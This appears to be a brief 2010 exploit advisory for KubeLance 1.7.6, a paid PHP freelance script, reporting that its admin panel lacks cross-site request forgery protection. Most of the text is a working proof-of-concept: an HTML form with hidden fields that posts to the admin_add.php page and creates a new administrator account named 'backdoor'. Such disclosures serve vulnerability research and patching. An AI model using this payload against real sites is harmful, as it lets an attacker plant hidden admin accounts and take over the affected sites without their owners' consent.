Security

  Text :  

[#-------------------------------------------------------------------------
----------------------#]
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 02. February 2010.
[#-------------------------------------------------------------------------
----------------------#]
[#] Application: KubeLance
[#] Version: 1.7.6
[#] Platform: PHP
[#] Link: http://www.kubelabs.com/kubelance/
[#] Price: 90 $
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)
[#-------------------------------------------------------------------------
----------------------#]

KubeLance script lack of cross site request forgery protection, allowing
us
to make exploit and
add new admin user.

[EXPLOIT-------------------------------------------------------------------
-----------------------]
<form action="http://localhost/kubelance/adm/admin_add.php"
method="post">
<input type="hidden" name="username"
value="backdoor">
<input type="hidden" name="password"
value="another-admin-added">
<input type="submit" name="submit">
</form>
[EXPLOIT-------------------------------------------------------------------
-----------------------]

[#]EOF

  References :  

None